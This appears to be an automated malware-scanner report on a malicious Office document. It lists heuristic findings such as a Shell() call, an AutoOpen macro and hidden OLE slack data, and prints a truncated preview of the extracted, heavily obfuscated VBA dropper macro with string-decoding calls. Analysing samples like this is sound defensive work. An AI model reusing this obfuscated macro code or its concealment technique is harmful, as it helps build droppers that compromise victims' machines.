MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing legacy WordBasic and Excel 4.0 macro markers, along with significant VBA macros. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro attempts to execute arbitrary commands. The obfuscated nature of the VBA code implies it is designed to download and run a secondary payload, a common tactic for initial compromise.
Heuristics 7
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 176,640 bytes but its declared streams total only 27,227 bytes — 149,413 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58224 bytes |
SHA-256: 59328089f00ef9d2977a033d17b613f397d4dd71a618d2b17183fdaf1cadbd1c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rPYOowbT"
Function LCFaIORsGTpzr()
On Error Resume Next
Select Case iQIaO
Case 76642
qUSbMi = ociSb
BbThZR = Round(18503)
orWdL = Hex(WBtRC - ChrW(WmjYUF))
ivtQK = mzDwbB
Case 94661
TBdwwA = CByte(49077)
njQPcL = Log(rvMTt)
End Select
GwYGVEpNl = icqQH("@A4k dmMB", KstoL - KstoL + 3 + KstoL - KstoL, KstoL - KstoL + 3 + KstoL - KstoL)
Select Case ZuaLdZ
Case 18208
ESQEU = kGcWE
qIKAuX = Round(50477)
MBPhED = Hex(HCkUbQ - ChrW(iRAKH))
dlTpO = kRjaQG
Case 98630
GDCiA = CByte(32595)
dDrCd = Log(RZtAkP)
End Select
Select Case VUwKrG
Case 35197
KmOsh = zzXYjQ
QLluh = Round(14074)
BMnBlz = Hex(fnXLhE - ChrW(QBvsTY))
TWhVja = JLPJz
Case 75073
zwMGi = CByte(36197)
KANBM = Log(AJpCOi)
End Select
JLMNt = icqQH(",@a8z^p^S^mnP8N", HbiZS - HbiZS + 5 + HbiZS - HbiZS, HbiZS - HbiZS + 6 + HbiZS - HbiZS)
Select Case hqFjCY
Case 43048
bHCiR = TCill
iIVTU = Round(44289)
FzVNuQ = Hex(jHtjE - ChrW(wvisL))
uNhHH = ddEYU
Case 72650
fcRVF = CByte(89194)
SNjLJ = Log(hbJiZ)
End Select
Select Case OURDw
Case 94269
aGqNB = YKGnq
jjZNlR = Round(56080)
XlGrM = Hex(dqfiB - ChrW(wjnKb))
HjFwQ = vMBSo
Case 13621
lTZBoA = CByte(97416)
qjifb = Log(jnzvPm)
End Select
SXspkTjrh = icqQH("5q2^o^c^% z4@GZm", IAcjYs - IAcjYs + 7 + IAcjYs - IAcjYs, IAcjYs - IAcjYs + 8 + IAcjYs - IAcjYs)
Select Case JuSZV
Case 10900
AJLBYz = nWiwK
ORzWTo = Round(28335)
YBWZV = Hex(cZHcT - ChrW(CAjXhG))
WwQRwF = GruvF
Case 62878
kbHobD = CByte(74096)
OPGfPa = Log(lcpMK)
End Select
Select Case wwbYda
Case 5763
YWjCom = wFcOV
VwGcH = Round(18358)
LZkzJi = Hex(IzkBCJ - ChrW(pkuOQL))
DNWzoF = BVwWRS
Case 65850
llsJDF = CByte(676)
aLLpj = Log(LNqzt)
End Select
QjRLczPGJj = icqQH("425zXvBTqiuAjtttzJbjZ", PHkaUM - PHkaUM + 2 + PHkaUM - PHkaUM, PHkaUM - PHkaUM + 12 + PHkaUM - PHkaUM)
Select Case LNAVZ
Case 10694
coflr = qzIWH
lCswm = Round(55897)
wpJif = Hex(YZmXl - ChrW(jwzXj))
ZUnpMD = ipIFSR
Case 26441
JIQTGA = CByte(34707)
bEbXz = Log(JmiMB)
End Select
Select Case XNMRAT
Case 15579
cSjumO = rGNWf
ZFjIia = Round(31039)
GLUduc = Hex(kdtti - ChrW(SaGAF))
Zbtrij = zIfIS
Case 87153
LVGMRs = CByte(74147)
GdUczD = Log(fZIcd)
End Select
OihIMuo = icqQH("zPPAL i", IbGdG - IbGdG + 2 + IbGdG - IbGdG, IbGdG - IbGdG + 10 + IbGdG - IbGdG)
Select Case JNTptq
Case 59211
FUbAq = wTuiN
jVQWB = Round(74013)
qdFAqP = Hex(CImXX - ChrW(HcBIt))
GqKLfZ = TJnzz
Case 75831
ronAU = CByte(71004)
oLojWL = Log(CEUHd)
End Select
Select Case toVUBi
Case 81897
VwjND = kJjlLK
GURGZ = Round(45138)
saWfsv = Hex(zvqXv - ChrW(uzYpbY))
jRKNq = hmUEO
Case 52755
uIvbB = CByte(39903)
imOsO = Log(OHHvc)
End Select
ZsUiozfz = icqQH("kKP %^c^E^p^Szn", fJjRZ - fJjRZ + 4 + fJjRZ - fJjRZ, fJjRZ - fJjRZ + 11 + fJjRZ - fJjRZ)
Select Case BKMaPJ
Case 78530
Odcqcv = BlEzoG
iwDRz = Round(51036)
ZfYcja = Hex(ihfRM - ChrW(tFKXPS))
NVDwoY = jQXwKO
Case 71674
zDOtVj = CByte(36269)
YfbTW = Log(mjBju)
End Select
Select Case w
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.